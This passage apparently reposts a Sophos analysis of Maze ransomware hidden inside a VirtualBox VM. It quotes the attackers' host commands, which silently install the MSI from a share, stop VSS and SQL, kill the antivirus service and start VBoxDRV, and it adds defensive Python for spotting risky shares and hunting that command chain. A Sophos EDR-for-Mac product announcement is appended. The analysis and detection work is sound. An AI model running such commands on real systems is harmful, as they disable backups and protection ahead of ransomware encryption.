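    found = []
    for elem in root.iter():
        if elem.tag.rsplit("}", 1)[-1] != "SharedFolder":
            continue
        found.append({
            "name": elem.get("name", ""),
            "hostPath": elem.get("hostPath", ""),
            "writable": elem.get("writable", "false").lower() == "true",
        })
    return found


def risky_shares(xml_text):
    """hostPaths the guest could encrypt: writable and rooted at a drive letter or UNC share."""
    risky = []
    for sf in shared_folders(xml_text):
        hp = sf["hostPath"]
        unc = hp.startswith("\\\\")
        drive_root = len(hp) <= 3 and hp[1:2] == ":"
        if sf["writable"] and (unc or drive_root):
            risky.append(hp)
    return risky


# Constructed sample shaped like micro.xml; namespace, names and paths are invented.
SAMPLE_VM_XML = """<?xml version="1.0"?>
<VirtualBox xmlns="http://www.innotek.de/VirtualBox-settings" version="1.9-windows">
  <Machine name="micro" OSType="Windows7">
    <SharedFolders>
      <SharedFolder name="E_DRIVE" hostPath="E:\\" writable="true"/>
      <SharedFolder name="FS01" hostPath="\\\\fs01\\shared" writable="true"/>
      <SharedFolder name="Tools" hostPath="C:\\Tools" writable="false"/>
    </SharedFolders>
  </Machine>
</VirtualBox>
"""

if __name__ == "__main__":
    print("VDI check (fake, plain):", demo_vdi_check())
    print("writable root-level shares:", risky_shares(SAMPLE_VM_XML))
```

Matching on the header signature rather than the extension matters because the package author controls the file names; the XML check is the quick way to see which of the victim's drives and shares the guest was given write access to, before the disk image is ever mounted.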

The Ragnar Locker connection

The technique used in the third attack is completely different from those previously used by the threat actors behind Maze, but the investigators recognized it immediately, because the team that responded to this Maze attack is the same team that responded to the Ragnar Locker ransomware attack in which the technique was first seen.

In an earlier attack, Ragnar Locker also deployed a virtual machine in an attempt to bypass protection measures

In Sophos’ earlier reporting about Ragnar Locker, we wrote that “Ragnar Locker ransomware was deployed inside an Oracle VirtualBox Windows XP virtual machine. The attack payload was a 122 MB installer with a 282 MB virtual image inside—all to conceal a 49 kB ransomware executable.” MITRE has subsequently added this technique to its ATT&CK framework.

The Maze attackers took a slightly different approach, using a virtual Windows 7 machine instead of Windows XP. This significantly increases the size of the virtual disk, but it also adds functionality that wasn't available in the Ragnar Locker version. The threat actors bundled a VirtualBox installer and the weaponized VM disk inside a file named pikujuwusewa.msi, and used a batch script called starter.bat to launch the attack from within the VM.

The virtual machine that Sophos extracted from the Maze attack shows that this newer VM is configured so that a different ransomware payload can easily be swapped in on the attacker's 'builder' machine. The cost in size is significant, though: the Ragnar Locker virtual disk was only about a quarter the size of the nearly 2GB virtual disk used in the Maze attack, all to conceal a single 494 KB ransomware executable from detection.

Component                     Ragnar Locker             Maze
MSI installer                 122 MB (OracleVA.msi)     733 MB (pikujuwusewa.msi)
Virtual Disk Image (VDI)      282 MB (micro.vdi)        1.90 GB (micro.vdi)
Ransomware binary in VDI      49 KB (vrun.exe)          494 KB (payload)


The attackers also executed the following commands on the host computer during the Maze attack:

cmd /c msiexec /qn /i \\<machine-hosting-malware>\frs\pikujuwusewa.msi

This runs the Windows Installer silently (/qn) from a network share, installing VirtualBox and dropping the virtual hard drive.

C:\Windows\System32\cmd.exe /C sc stop vss

This stops the Volume Shadow Copy service; the ransomware itself also includes a command to delete existing shadow copies.

C:\Windows\System32\cmd.exe /C sc stop sql

This halts SQL services so that database files are no longer held open and can be encrypted.

C:\Windows\System32\cmd.exe /C taskkill /F /IM SavService.exe

This attempts to kill the Sophos endpoint protection service (and fails).

C:\Windows\System32\cmd.exe /C sc start VBoxDRV

Finally, this starts the VirtualBox kernel driver service (VBoxDRV), after which the VM can be launched.
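Each of those commands shows up as a process-creation event whether or not it succeeded (the taskkill against SavService.exe failed, but the attempt was still logged), so the chain is a good hunting target. The Python below is an added example, not Sophos' detection logic: it runs one rule per listed command over a constructed batch of events shaped like Sysmon Event ID 1 or EDR process telemetry, and only pages on a host when the VM drop and the driver start appear together, or when three or more distinct steps do. The field names (ts, host, cmdline), the host names, the share name and the generalisation from the quoted strings to any UNC-hosted .msi and any SQL-named service are this example's own assumptions.

```python
"""Added example, not Sophos code: hunt for the host-side command chain the
article lists, over a constructed batch of process-creation events shaped like
Sysmon Event ID 1 / EDR telemetry. The field names (ts, host, cmdline) and the
host names are this example's assumptions, not Sophos' schema or the victim's.

A failed taskkill still produces a process-creation event, which is why the
rules key on the attempt rather than on its outcome."""
import re
from collections import defaultdict

# One regex per step quoted in the write-up. Generalising from the quoted
# strings to any UNC-hosted .msi and any SQL-named service is this example's own.
RULES = [
    ("msi_from_unc_share", re.compile(r"msiexec(?:\.exe)?\s.*?/i\s+\\\\\S+\.msi", re.I)),
    ("stop_vss",           re.compile(r"\bsc(?:\.exe)?\s+stop\s+vss\b", re.I)),
    ("stop_sql",           re.compile(r"\bsc(?:\.exe)?\s+stop\s+\S*sql\S*", re.I)),
    ("kill_av_service",    re.compile(r"taskkill(?:\.exe)?\s.*?/IM\s+SavService\.exe", re.I)),
    ("start_vbox_driver",  re.compile(r"\bsc(?:\.exe)?\s+start\s+VBoxDRV\b", re.I)),
]
MSI_PATH = re.compile(r"/i\s+(\\\\\S+\.msi)", re.I)


def match_rules(cmdline):
    """Labels of every rule the command line trips."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def summarise(events):
    """Per host, the sorted list of distinct rule labels seen across its events."""
    hits = defaultdict(set)
    for ev in events:
        for label in match_rules(ev.get("cmdline", "")):
            hits[ev["host"]].add(label)
    return {host: sorted(labels) for host, labels in hits.items()}


def flag_hosts(events, min_rules=3):
    """Hosts worth paging on: VM drop plus driver start together, or at least
    min_rules distinct steps. A lone 'sc stop vss' from backup housekeeping
    does not clear the bar on its own."""
    flagged = []
    for host, labels in summarise(events).items():
        vm_chain = "msi_from_unc_share" in labels and "start_vbox_driver" in labels
        if vm_chain or len(labels) >= min_rules:
            flagged.append(host)
    return sorted(flagged)


def msi_iocs(events):
    """UNC paths of any .msi installed silently: block them, then pull the file from the share."""
    found = set()
    for ev in events:
        m = MSI_PATH.search(ev.get("cmdline", ""))
        if m:
            found.add(m.group(1))
    return sorted(found)


# Constructed sample telemetry (timestamps, host names and share name are invented).
SAMPLE_EVENTS = [
    {"ts": "03:58:12", "host": "WS-117", "cmdline": "cmd /c msiexec /qn /i \\\\srv01\\frs\\pikujuwusewa.msi"},
    {"ts": "03:58:40", "host": "WS-117", "cmdline": "C:\\Windows\\System32\\cmd.exe /C sc stop vss"},
    {"ts": "03:58:41", "host": "WS-117", "cmdline": "C:\\Windows\\System32\\cmd.exe /C sc stop sql"},
    {"ts": "03:58:43", "host": "WS-117", "cmdline": "C:\\Windows\\System32\\cmd.exe /C taskkill /F /IM SavService.exe"},
    {"ts": "03:59:02", "host": "WS-117", "cmdline": "C:\\Windows\\System32\\cmd.exe /C sc start VBoxDRV"},
    {"ts": "22:00:00", "host": "BK-01",  "cmdline": "sc stop vss"},  # backup job housekeeping
    {"ts": "09:15:31", "host": "ADM-02", "cmdline": "msiexec /qn /i C:\\Installers\\7zip.msi"},  # local path
]

if __name__ == "__main__":
    for host, labels in summarise(SAMPLE_EVENTS).items():
        print(host, labels)
    print("flag:", flag_hosts(SAMPLE_EVENTS))
    print("msi IOCs:", msi_iocs(SAMPLE_EVENTS))
```

The scoring is deliberately per host rather than per event: any one of these commands has a benign reading (administrators stop VSS and SQL services all the time), and it is the cluster on a single machine within a short window that singles out the VM-based attack.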

The future of ransomware?

The Maze threat actors have proven adept at adopting techniques that other ransomware gangs have shown to be successful, including the use of extortion as a means of extracting payment from victims. As endpoint protection products improve their ability to defend against ransomware, attackers are forced to expend greater effort to make an end-run around those protections.

Sophos endpoint products detect components of this attack as Troj/Ransom-GAV or Troj/Swrort-EG. Indicators of compromise can be found on the SophosLabs GitHub.

Net Universe offers all Sophos devices and subscriptions, as well as consulting services, with worldwide delivery.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.

Sophos Endpoint Detection and Response now available for Macs – Sophos News

SOPHOS AUDIO: Karl Ackerman, Principal Product Manager, discusses the Sophos EDR strategy.

For many organizations, Macs are a regular fixture in their IT estates. Whether they comprise just a few devices or a significant proportion, Macs need the same levels of cybersecurity protection and visibility as their Windows cousins.

Which is why, in addition to proven protection from the latest Mac threats, Endpoint Detection and Response (EDR) is now available for Macs alongside Windows and Linux.

Intercept X Advanced with EDR gives both IT admins and cybersecurity experts the power to answer critical IT operations and threat hunting questions, and then remotely take any necessary actions.

Upgrade your IT security operations

Maintaining proper IT hygiene can be a significant time investment for IT admins. Being able to identify which devices need attention and what action needs to be taken can add another layer of complexity.

With Sophos EDR, you can now do just that – quickly and easily. For example:

  • Find devices with software vulnerabilities, unknown services running, or unauthorized browser extensions
  • Identify devices that have unwanted software
  • See if software has been deployed on devices, e.g. to make sure a rollout is complete
  • Remotely access devices to dig deeper and take action, such as installing software, editing configuration files, and rebooting a device

Hunt and neutralize threats

Tracking down subtle, evasive threats requires a tool capable of detecting even the smallest indicators of compromise.

With this release, Sophos EDR is significantly enhancing its threat hunting capabilities. For example:

  • Detect processes attempting to make a connection on non-standard ports
  • Get granular detail on unexpected script executions
  • Identify processes that have created files or modified configuration files
  • Remotely access a device to deploy additional forensic tools, terminate suspect processes, and run scripts or programs

Introducing Live Discover and Live Response

Live Discover and Live Response are the features that make all of the examples above possible.

Live Discover lets you examine your data for almost any question you can think of by searching across Mac devices with SQL queries. You can choose from a selection of out-of-the-box queries, each of which can be fully customized to pull exactly the information you need, both for IT security operations hygiene and for threat hunting. Data is stored on-disk for up to 90 days, so queries return quickly.

Live Response is a command line interface that can remotely access devices in order to perform further investigation or take appropriate action. For example:

  • Rebooting a device pending updates
  • Terminating suspicious processes
  • Browsing the file system
  • Editing configuration files
  • Running scripts and programs

And it’s all done remotely, so it’s ideal in working situations where you may not have physical access to a device that needs attention.

Try the new features

Existing Intercept X Advanced with EDR customers will automatically see their Mac devices appearing for selection in Live Discover and Live Response by September 16.

Intercept X and Intercept X for Server customers that would like to try out EDR functionality can head to the Sophos Central console, select ‘Free Trials’ in the left-hand menu and choose the ‘Intercept X Advanced with EDR’ or ‘Intercept X Advanced for Server with EDR’ trial.

If you’re new to Sophos Central, start a no-obligation free trial of Intercept X Advanced with EDR today. You’ll get world class protection against the latest cybersecurity threats in addition to powerful EDR capabilities. Get started.

Live Discover and Live Response are available for Windows, Mac, and Linux devices.
